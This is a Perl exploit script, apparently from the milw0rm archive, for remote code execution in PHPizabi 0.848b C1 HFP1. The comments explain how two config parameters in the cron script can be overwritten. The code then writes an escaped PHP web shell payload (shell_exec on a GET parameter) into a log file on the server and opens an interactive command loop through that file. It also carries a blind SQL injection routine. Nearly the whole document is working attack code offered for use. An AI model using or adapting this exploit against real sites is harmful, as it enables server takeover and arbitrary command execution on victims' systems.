PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit#!/usr/bin/perl 
#inphex
#PHPizabi v0.848b C1 HFP1 Remote Code Execution
#http://www.dz-secure.com/tools/1/WebESploit.pl.txt
#if you are seeking for a partner to work on some project(s) just send an email inphex0 [ at ] gmail [ dot ] com
#system/v_cron_proc.php
#	if (!function_exists(`writeLogEntry`)) {
#		function writeLogEntry($data) {
#			global $CONF;
#			
#			touch($CONF[`CRON_LOGFILE`]);
#		
#			if ($handle = fopen($CONF[`CRON_LOGFILE`], `a`)) {
#				fwrite($handle, `[`.date($CONF[`LOCALE_LONG_DATE_TIME`]).`] $data \n`);
#				fclose($handle);
#			}
#		}
#	}
#
#
#writeLogEntry(`Cron cycle started`);
#writeLogEntry(`Cron cycle ended`);
########################################################
#overwritable:
#1.$CONF[`CRON_LOGFILE`]
#2.$CONF[`LOCALE_LONG_DATE_TIME`]
#
#date($CONF[`LOCALE_LONG_DATE_TIME`]) ;\
#solution:
#<?php 
#echo date(`a`);
#?>
#returns: pm
#<?php 
#echo date(`\a`);
#?>
#returns: a
#seems logically eh?
#
#usage: perl ye.pl host /path/
#
## [C:\]# perl ye.pl host /path/
## $[host]# id
## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)
#
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;

$hy = shift;
$host_ = `http://`.$hy;
$path_ = shift;
$port = 80; #default
$info{'info'} = { 
	`description` => [``],
	`options` =>
	{
		`agent` => ``,  
		`proxy` => ``,  
		`default_headers` => [  
			[`key`,`value`]], 
		`timeout` => 0, 
		`cookie` =>     
		{
			`cookie` => [``],
		},
	},
	`sending_options` =>
	{
			`host` => $host_, 
			`path` => $path_.`system/v_cron_proc.php`,
		        `port` => $port,                  
			`method_a` => `REMOTE_CO(MMAND)/CODE EXECUTION`,  
			`attack` =>
		{
				`CONF[CRON_LOGFILE]` => [`get`,`CONF[CRON_LOGFILE]`,`yeee.php`],
				`CONF[LOCALE_LONG_DATE_TIME]` => [`get`,`CONF[LOCALE_LONG_DATE_TIME]`,`<?\\p\\h\\p \\e\\c\\h\\o \\s\\h\\e\\l\\l_\\ex\\e\\c\\(\\\$_\\G\\E\\T[\\c\\m\\d]\\);\\e\\x\\i\\t;?>`], #nice eh?:)
		},
	},

};

&amp;start($info{'info'},222);
while () {
	print `\$[`.$hy.`]#`;
	$cmd = <STDIN>;chomp($cmd);
	$info{'info'} = { 
		`description` => [``],
		`options` =>
			{
			`agent` => ``,  
			`proxy` => ``,  
			`default_headers` => [  
				[`key`,`value`]], 
			`timeout` => 0, 
			`cookie` =>     
			{
				`cookie` => [``],
			},
		},
		`sending_options` =>
		{
				`host` => $host_, 
				`path` => $path_.`system/yeee.php`,
			    `port` => $port,                  
				`method_a` => `REMOTE_CO(MMAND)/CODE EXECUTION`,  
				`attack` =>
			{
					`CONF[CRON_LOGFILE]` => [`get`,`cmd`,$cmd],
			},
		},

	};

&amp;start($info{'info'},221); 
print ${$info{'info'}}{221}{'content'}.`\n`;
}
sub start
{
	
	$a_ = shift;
	$id = shift;
	$post_dA = ``;
	$get_dA = get_d_p_s(`get`);
	$post_dA = get_d_p_s(`post`);

	my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
        $jj = 1;
	$ii = 48;
        $hh = 1;
	$ppp = 0;
	$s = shift;
	$a = ``;
	$res_p = ``;
	$h = ``;
	$ua= ``;
	$agent= ``;
	$k= ``;
	$v= ``;
	$get_data= ``;
	$post_data= ``;
	$header_dA = ``;
	$h_host_h_xdsjaop = $a_->{'sending_options'}{'host'};
	$h_path_h_xdsjaop = $a_->{'sending_options'}{'path'};
	$h_port_h_xdsjaop = $a_->{'sending_options'}{'port'};
	$method_m = $a_->{'sending_options'}{'method_a'};
	$ua = LWP::UserAgent->new;
	$ua->timeout($a_->{'options'}{'timeout'});  
	if ($a_->{'options'}{'proxy'}) {
	    $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
	}
	$agent = $a_->{'options'}{'agent'} || `Mozilla/5.0`; 
	$ua->agent($agent); 
	{                                                 
		while (($k,$v) = each(%{$a_}))
			{
			if ($k ne `options` &amp;&amp; $k ne `sending_options`)
				{
				foreach $r (@{$a_->{$k}})
					{
						print $a_->{$k}[0];
					}
				}
			}


		foreach $j (@{$a_->{'options'}{'default_headers'}})
			{    
			$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
			$m++;
			}

		if ($a_->{'options'}{'cookie'}{'cookie'}[0])
			{          
			$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
			}

			

	}
	switch ($method_m)        
	{
		case `attack` { &amp;attack();}
		case `SQL_INJECTION_BLIND` { &amp;sql_injection_blind();}
		case `REMOTE_COMMAND_EXECUTION` { &amp;attack();}
		case `REMOTE_CODE_EXECUTION` {&amp;attack();}
		case `REMOTE_FILE_INCLUSION` { &amp;attack();}
		case `LOCAL_FILE_INCLUSION` { &amp;attack(); }
		else { &amp;attack(); }  

	}


	sub attack
	{
		my ($jj);
		my ($h);
		my($x);
		if ($post_dA eq ``) {
			$method = `get`;
		} elsif ($post_dA ne ``)
		{
			$method = `post`;
		}
		if ($method eq `get`) {  
			$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop.`?`.$get_dA);
			${$a_}{$id}{'content'} = $res_p;
			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
				{
				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
				
				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
					{
					if (${$jj} ne ``)
						{
						${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
						$x++;
						}
						$jj++;
					}
					
					$h++;
				}
		} elsif ($method eq `post`)
		{
			$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop.`?`.$get_dA,`application/x-www-form-urlencoded`,$post_dA);
		
			${$a_}{$id}{'content'} = $res_p;

			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
				{
				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
					{
					if (${$jj} ne ``)
						{
						${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
						$x++;
						}
						$jj++;
					}
					$h++;
				}
		}

	}
	sub sql_injection_blind
	{
		while ()
			{
			while ($ii <= 120)
				{
				
				$itsx = `[`.chr($ii).`]`;
				$l = length($itsx);
				$b = (`\b`)x$l;
				syswrite STDOUT,$b.$itsx;

				if(check($ii,$hh) == 1)
				{
					syswrite STDOUT,$b.chr($ii).`---`;
					$hh++;
					$chr = $chr.chr($ii);
					}
					$ii++;
			}
			push(@ffs,length($chr)); 
			if (($#ffs - 999) == $ffs)
				{
				exit;
				}
				$ii = 48;
		}
	}
	sub check($$)
	{
		my ($h);
		my ($a);
		$ii = shift;
		$hh = shift;

		if (get_d_p_s(`post`) ne ``)
			{
			$method = `post`;
		} else { $method = `get`;}
		if ($method eq `get`)
			{
			$ppp++;
			$query = modify($get_dA,$ii,$hh);
			$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}.`?`.$query);

			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
				{
				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
					{
					if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
						return 1;
					} else { return 0;}
					}
					else 
				{
						if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
							return 0;
						}else { return 1;}
	
						
				}
				$h++;
			}
		} elsif ($method eq `post`)
			{
			$ppp++;
			$query_g = modify($get_dA,$ii,$hh);
			$query_p = modify($post_dA,$ii,$hh);
			
			$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}.`?`.$query_g,`application/x-www-form-urlencoded`,$query_p);
			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
				{
				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
					{
					return 1;
					}
					else 
					{
						return 0;
					}
				$h++;
			}
		}
	}
    sub modify($$$)
	{
	    $string = shift;
	    $replace_by = shift;
	    $replace_by1 = shift;

	    if ($string !~/\$i/ &amp;&amp; $string !~/\$h/) {
		    return $string;
	        } elsif ($string !~/\$i/)
		{
		        $ff = substr($string,0,index($string,`\$h`));
	            $ee =  substr($string,rindex($string,`\$h`)+2);
	            $string = $ff.$replace_by1.$ee;

	            return $string;
		} elsif ($string !~/\$h/)
		{
	        $f = substr($string,0,index($string,`\$i`));
	        $e = substr($string,rindex($string,`\$i`)+2);
	        $string = $f.$replace_by.$e;
		    return $string;
		} else
		{
		    $f = substr($string,0,index($string,`\$i`));
	        $e = substr($string,rindex($string,`\$i`)+2);
	        $string = $f.$replace_by.$e;

		    $ff = substr($string,0,index($string,`\$h`));
	        $ee =  substr($string,rindex($string,`\$h`)+2);
	        $string = $ff.$replace_by1.$ee;

		    return $string;
		}
	}
	sub get_d_p_s
	{
		$k = 0;
		$v = 0;
		$g_d_p_s = shift;

		@post = ();
		@get = ();
		
		$post_data = ``;
		$get_data = ``;
		$header_data = ``;
		%header_dA = ();
		$p = ``;
		$g = ``;
		while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
			{
			if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/)
				{
				$p .= $a_->{'sending_options'}{'attack'}{$k}[1].`=`.$a_->{'sending_options'}{'attack'}{$k}[2].`&amp;`;
				} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) {
					$g .= $a_->{'sending_options'}{'attack'}{$k}[1].`=`.$a_->{'sending_options'}{'attack'}{$k}[2].`&amp;`;
				} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ `header`)
				{
				        $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
				}
			}
		if ($g_d_p_s eq `get`)
			{
			return $g;
			}
			elsif ($g_d_p_s eq `post`)
		{
			return $p;
		} elsif ($g_d_p_s eq `header`)
		{
			return %header_dA;
		}

			@a_ = ();
	}
	sub get_data
	{
		$h_host_h_xdsjaop = shift;
		$h_path_h_xdsjaop = shift;
		%hash = get_d_p_s(`header`);
	    while (($u,$c) = each(%hash))
			{
			$ua->default_headers->push_header($u => $c);
			}
		$req = $ua->get($h_host_h_xdsjaop.`:`.$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
		return $req->content;
	}
	sub post_data
	{
		$h_host_h_xdsjaop = shift;
		$h_path_h_xdsjaop = shift;
		$content_type = shift;
		$send = shift;
		%hash = get_d_p_s(`header`);
	    while (($u,$c) = each(%hash))
			{
		    $ua->default_headers->push_header($u => $c);
			}
		$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.`:`.$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
		$req->content_type($content_type);
		$req->content($send);
		$res = $ua->request($req);
		return $res->content;
	}

}

# milw0rm.com [2008-07-16]